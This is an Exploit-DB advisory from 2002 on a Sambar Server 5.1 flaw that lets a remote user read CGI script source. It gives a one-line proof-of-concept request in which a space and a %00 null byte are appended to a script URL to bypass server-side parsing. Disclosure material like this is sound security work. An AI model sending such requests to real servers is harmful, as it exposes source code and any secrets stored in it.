Sambar Server 5.1 - Script Source Disclosure

EDB-ID:

21390


Author:

pgrundl

Type:

remote


Platform:

CGI

Date:

2002-04-17


source: https://www.securityfocus.com/bid/4533/info

An issue has been discovered in Sambar Server, which could allow a user to reveal the source code of script files.

Submitting a request for a known script file along with a space and null character (%00), will successfully bypass the serverside URL parsing. 

http://server/cgi-bin/environ.pl+%00